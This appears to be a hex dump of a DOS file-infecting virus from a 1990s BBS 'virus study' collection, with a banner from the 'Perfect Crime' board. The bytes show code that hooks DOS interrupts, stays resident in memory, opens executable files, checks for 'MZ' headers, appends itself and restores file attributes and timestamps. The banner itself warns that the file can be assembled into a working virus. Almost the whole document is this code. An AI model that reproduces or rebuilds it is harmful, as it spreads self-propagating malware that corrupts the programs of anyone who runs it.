13B0:06B0 00 2E 89 1E 04 00 0E 1F-BA BD 00 B8 24 25 CD 21 ............$%.!
13B0:06C0 0E 1F BA 14 00 B4 0F CD-21 B8 00 43 8E 5E 0E 8B ........!..C.^..
13B0:06D0 56 06 CD 21 73 03 E9 DA-01 2E 89 0E 08 00 B8 01 V..!s...........
13B0:06E0 43 80 E1 FE CD 21 73 03-E9 C8 01 B8 02 3D 8E 5E C....!s......=.^
13B0:06F0 0E 8B 56 06 CD 21 73 03-E9 A8 01 2E A3 0A 00 8B ..V..!s.........
13B0:0700 D8 0E 1F BA 0C 00 B9 06-00 B4 3F CD 21 72 19 3D ..........?.!r.=
13B0:0710 06 00 75 14 2E 81 3E 0C-00 4D 5A 75 03 E9 B5 01 ..u...>..MZu....
13B0:0720 2E 80 3E 0C 00 E9 74 03-E9 6F 01 B8 02 42 B9 00 ..>...t..o...B..
13B0:0730 00 8B D1 2E 8B 1E 0A 00-CD 21 72 EC 83 FA 00 75 .........!r....u
13B0:0740 E7 3D B6 04 76 E2 3D 93-F5 73 DD 2E A3 9E 04 2E .=..v.=..s......
13B0:0750 A1 0D 00 05 03 01 2E A3-A0 04 B8 02 42 B9 FF FF ............B...
13B0:0760 BA F8 FF 2E 8B 1E 0A 00-CD 21 72 BC 2E 8B 1E 0A .........!r.....
13B0:0770 00 0E 1F BA 0C 00 B9 08-00 B4 3F CD 21 72 A9 3D ..........?.!r.=
13B0:0780 08 00 75 A4 2E 81 3E 10-00 F4 7A 75 77 2E 83 3E ..u...>...zuw..>
13B0:0790 12 00 05 90 73 92 2E A1-0C 00 2E A3 9E 04 2E A1 ....s...........
13B0:07A0 0E 00 2E A3 A0 04 2D 03-01 2E A3 0C 00 B8 00 42 ......-........B
13B0:07B0 B9 00 00 BA 01 00 2E 8B-1E 0A 00 CD 21 72 5F B4 ............!r_.
13B0:07C0 40 0E 1F BA 0C 00 B9 02-00 CD 21 72 51 3D 02 00 @.........!rQ=..
13B0:07D0 75 4C 2E 8B 1E 0A 00 B4-45 CD 21 72 08 8B D8 B4 uL......E.!r....
13B0:07E0 3E CD 21 72 39 B8 00 42-B9 00 00 2E 8B 16 9E 04 >.!r9..B........
13B0:07F0 2E 8B 1E 0A 00 CD 21 72-25 B4 40 0E 1F B9 00 00 ......!r%.@.....
13B0:0800 CD 21 72 1A B8 00 42 B9-00 00 2E 8B 16 9E 04 83 .!r...B.........
13B0:0810 C2 0F 83 E2 F0 2E 8B 1E-0A 00 CD 21 73 03 EB 7A ...........!s..z
13B0:0820 90 2E 8B 1E 0A 00 8C CA-4A 8E DA BA 00 00 B9 B6 ........J.......
13B0:0830 04 B4 40 CD 21 72 E7 3D-B6 04 75 E2 2E 8B 1E 0A ..@.!r.=..u.....
13B0:0840 00 B4 45 CD 21 72 08 8B-D8 B4 3E CD 21 72 CF 2E ..E.!r....>.!r..
13B0:0850 C6 06 0C 00 E9 2E 8B 16-9E 04 83 C2 0F 83 E2 F0 ................
13B0:0860 83 EA 03 81 C2 AC 03 2E-89 16 0D 00 B8 00 42 B9 ..............B.
13B0:0870 00 00 8B D1 2E 8B 1E 0A-00 CD 21 72 A1 2E 8B 1E ..........!r....
13B0:0880 0A 00 0E 1F BA 0C 00 B9-03 00 B4 40 CD 21 72 8E ...........@.!r.
13B0:0890 3D 03 00 75 89 B8 07 0E-CD 10 B4 3E 2E 8B 1E 0A =..u.......>....
13B0:08A0 00 CD 21 B8 01 43 8E 5E-0E 8B 56 06 2E 8B 0E 08 ..!..C.^..V.....
13B0:08B0 00 CD 21 0E 1F BA 14 00-B4 10 CD 21 B8 24 25 2E ..!........!.$%.
13B0:08C0 C5 16 04 00 CD 21 58 5B-59 5A 5E 5F 5D 1F 07 9D .....!X[YZ^_]...
13B0:08D0 2E FF 2E 00 00 B8 02 42-B9 00 00 8B D1 2E 8B 1E .......B........
13B0:08E0 0A 00 CD 21 72 B4 83 FA-00 75 AF 3D B3 FD 73 AA ...!r....u.=..s.
13B0:08F0 2E A3 9E 04 2E A1 10 00-48 B1 09 D3 E0 2E 03 06 ........H.......
13B0:0900 0E 00 2E 3B 06 9E 04 75-91 2E 8B 1E 0A 00 B4 40 ...;...u.......@
13B0:0910 0E 1F BA 39 00 B9 84 00-CD 21 72 C8 3D 84 00 75 ...9.....!r.=..u
13B0:0920 E6 2E 8B 1E 0A 00 B4 45-CD 21 72 08 8B D8 B4 3E .......E.!r....>
13B0:0930 CD 21 72 B0 B8 00 42 B9-00 00 8B D1 2E 8B 1E 0A .!r...B.........
13B0:0940 00 CD 21 72 9F 2E C6 06-0C 00 E9 2E A1 9E 04 05 ..!r............
13B0:0950 11 00 2E A3 0D 00 2E 8B-1E 0A 00 B4 40 0E 1F BA ............@...
13B0:0960 0C 00 B9 03 00 CD 21 E9-30 FF 00 00 E8 00 00 5B ......!.0......[
13B0:0970 2E 89 47 FB B8 00 00 8E-C0 26 A1 C5 00 3D 7F 39 ..G......&...=.9
13B0:0980 75 08 26 A0 C7 00 3C 05-73 32 8B D4 2B D3 81 EA u.&...<.s2..+...
13B0:0990 6C 0B 72 28 BA C5 04 B1-04 D3 EA 2E 89 97 54 FC l.r(..........T.
13B0:09A0 8C D9 03 D1 8E C2 8B F3-81 C6 51 FC 8B FE B9 B6 ..........Q.....
13B0:09B0 04 FC F3 A4 06 E8 03 00-EB 13 90 CB 8C C8 8E D8 ................
13B0:09C0 8E C0 8E D0 2E 8B 47 FB-2E FF A7 01 01 BE 00 00 ......G.........
13B0:09D0 BF 00 00 8B CB 81 C1 61-FC 8C C2 4A 8E C2 8C DA .......a...J....
13B0:09E0 4A 8E DA 03 F1 4E 8B FE-FD F3 A4 FC 2E 8B 97 54 J....N.........T
13B0:09F0 FC 26 29 16 03 00 26 8C-0E 01 00 BF 00 00 8B F3 .&)...&.........
13B0:0A00 81 C6 51 FC B9 B6 04 1E-07 0E 1F F3 A4 26 83 2E ..Q..........&..
13B0:0A10 03 00 01 53 8C CB B4 50-CD 21 5B 2E 8C 0E 36 00 ...S...P.![...6.
13B0:0A20 2E 8B 16 2C 00 4A 8E C2-26 8C 0E 01 00 B8 21 35 ...,.J..&.....!5
13B0:0A30 53 CD 21 36 8C 06 02 00-36 89 1E 00 00 5B B8 21 S.!6....6....[.!
13B0:0A40 25 8C D2 8E DA BA C0 00-CD 21 B8 00 00 8E C0 26 %........!.....&
13B0:0A50 C7 06 C5 00 7F 39 26 C6-06 C7 00 05 8C C8 8E D8 .....9&.........
13B0:0A60 B4 1A BA 50 00 CD 21 2E-8B 47 FB E9 4E FF B7 04 ...P..!..G..N...
13B0:0A70 AC 05 F4 7A 05 00 00 00 ...z....
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
Copy Permalink